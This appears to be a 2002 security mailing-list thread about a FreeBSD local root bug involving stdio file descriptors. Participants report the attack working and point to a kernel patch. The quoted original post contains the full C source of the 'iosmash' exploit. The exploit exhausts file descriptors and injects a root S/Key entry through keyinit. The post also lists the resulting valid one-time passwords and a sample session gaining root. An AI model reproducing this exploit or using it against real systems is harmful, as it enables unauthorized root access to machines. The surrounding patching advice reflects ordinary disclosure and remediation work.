Re: cheers

From: Onie Camara (neil@restricted.dyndns.org)
Date: 04/25/02


From: "Onie Camara" <neil@restricted.dyndns.org>
To: "zeno" <bugtraq@cgisecurity.net>
Date: Wed, 24 Apr 2002 23:01:57 -0500

Thanks. This is what I did to one of my client's FreeBSD. Patch actually
complained. It asked me to reverse. :-)

----- Original Message -----
From: "zeno" <bugtraq@cgisecurity.net>
To: "Onie Camara" <neil@restricted.dyndns.org>
Cc: "KF" <dotslash@snosoft.com>; "bugtraq" <bugtraq@securityfocus.org>;
"vuln-dev" <vuln-dev@security-focus.com>
Sent: Wednesday, April 24, 2002 3:58 PM
Subject: Re: cheers

> >
> > Even on my FreeBSD 4.5 STABLE, I got root access. This is terrifying. :-)
> >
> > So any solutions?
>
> cvsup new source, rebuild kernel. A patch is out already.
>
> - zeno@cgisecurity.com
>
> >
> > ----- Original Message -----
> > From: "KF" <dotslash@snosoft.com>
> > To: "bugtraq" <bugtraq@securityfocus.org>; "vuln-dev"
> > <vuln-dev@security-focus.com>
> > Sent: Tuesday, April 23, 2002 1:24 AM
> > Subject: cheers
> >
> >
> > > http://www.phased.home.ro/iosmash.c
> > >
> > > -KF
> > >
> > >
> >
> >
>
> >
> >
> > >
> > > /*
> > >   phased/b10z
> > >   phased@snosoft.com
> > >   23/04/2002
> > >
> > >   stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE
> > >   decided to make a trivial exploit to easily get root :)
> > >
> > >   > id
> > >   uid=1003(phased) gid=999(phased) groups=999(phased)
> > >   > ./iosmash
> > >   Adding phased:
> > >   <--- HIT CTRL-C --->
> > >   > su
> > >   s/key 98 snosoft2
> > >   Password:MASS OAT ROLL TOOL AGO CAM
> > >   xes#
> > >
> > >   this program makes the following skeys valid
> > >
> > >   95: CARE LIVE CARD LOFT CHIC HILL
> > >   96: TESS OIL WELD DUD MUTE KIT
> > >   97: DADE BED DRY JAW GRAB NOV
> > >   98: MASS OAT ROLL TOOL AGO CAM
> > >   99: DARK LEW JOLT JIVE MOS WHO
> > >
> > >   http://www.snosoft.com
> > >   cheers Joost Pol
> > > */
> > >
> > > #include <stdio.h>
> > > #include <unistd.h>
> > >
> > > int main(int argc, char *argv[]) {
> > > while(dup(1) != -1);
> > > close(2);
> > > execl("/usr/bin/keyinit",
> > > "\nroot 0099 snosoft2 6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
> > > }
> > >
> > >
> >
> >
>
>